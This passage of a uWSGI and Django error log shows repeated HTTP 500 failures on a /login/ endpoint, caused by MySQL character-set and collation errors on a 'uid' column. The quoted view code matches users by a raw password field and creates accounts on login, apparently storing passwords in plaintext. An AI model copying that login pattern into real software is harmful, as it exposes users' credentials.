654/810] 219.228.146.253 () {48 vars in 916 bytes} [Thu Jan 14 08:06:21 2021] POST /login/ => generated 209363 bytes in 136 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 655/811] 180.160.63.35 () {36 vars in 695 bytes} [Thu Jan 14 08:09:48 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 656/812] 180.160.63.35 () {36 vars in 697 bytes} [Thu Jan 14 08:09:48 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 2069|app: -1|req: -1/813] 180.160.63.35 () {38 vars in 720 bytes} [Thu Jan 14 08:09:48 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/814] 180.160.63.35 () {38 vars in 742 bytes} [Thu Jan 14 08:09:48 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/815] 180.160.63.35 () {38 vars in 724 bytes} [Thu Jan 14 08:09:48 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/816] 180.160.63.35 () {38 vars in 722 bytes} [Thu Jan 14 08:09:48 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/817] 180.160.63.35 () {38 vars in 728 bytes} [Thu Jan 14 08:09:48 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/818] 180.160.63.35 () {38 vars in 703 bytes} [Thu Jan 14 08:09:48 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/819] 180.160.63.35 () {38 vars in 701 bytes} [Thu Jan 14 08:09:48 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/820] 180.160.63.35 () {38 vars in 717 bytes} [Thu Jan 14 08:09:48 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/821] 180.160.63.35 () {38 vars in 719 bytes} [Thu Jan 14 08:09:48 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/822] 180.160.63.35 () {38 vars in 709 bytes} [Thu Jan 14 08:09:49 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/823] 180.160.63.35 () {38 vars in 774 bytes} [Thu Jan 14 08:09:51 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/824] 180.160.63.35 () {38 vars in 748 bytes} [Thu Jan 14 08:09:51 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x9C\\x9F\\xE6\\x9C\\xAB...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x9C\\x9F\\xE6\\x9C\\xAB...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 657/825] 180.160.63.35 () {48 vars in 919 bytes} [Thu Jan 14 08:10:13 2021] POST /login/ => generated 209237 bytes in 129 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x9C\\x9F\\xE6\\x9C\\xAB...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x9C\\x9F\\xE6\\x9C\\xAB...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 658/826] 180.160.63.35 () {48 vars in 919 bytes} [Thu Jan 14 08:10:32 2021] POST /login/ => generated 209237 bytes in 127 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x9C\\x9F\\xE6\\x9C\\xAB...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x9C\\x9F\\xE6\\x9C\\xAB...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 659/827] 180.160.63.35 () {48 vars in 919 bytes} [Thu Jan 14 08:10:58 2021] POST /login/ => generated 209237 bytes in 121 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x9C\\x9F\\xE6\\x9C\\xAB...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x9C\\x9F\\xE6\\x9C\\xAB...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 660/828] 180.160.63.35 () {48 vars in 919 bytes} [Thu Jan 14 08:11:11 2021] POST /login/ => generated 209237 bytes in 108 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 233, in login + if len(models.User.objects.filter(uid=uid, password=pwd)) != 0: + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 269, in __len__ + self._fetch_all() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all + self._result_cache = list(self._iterable_class(self)) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__ + results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File 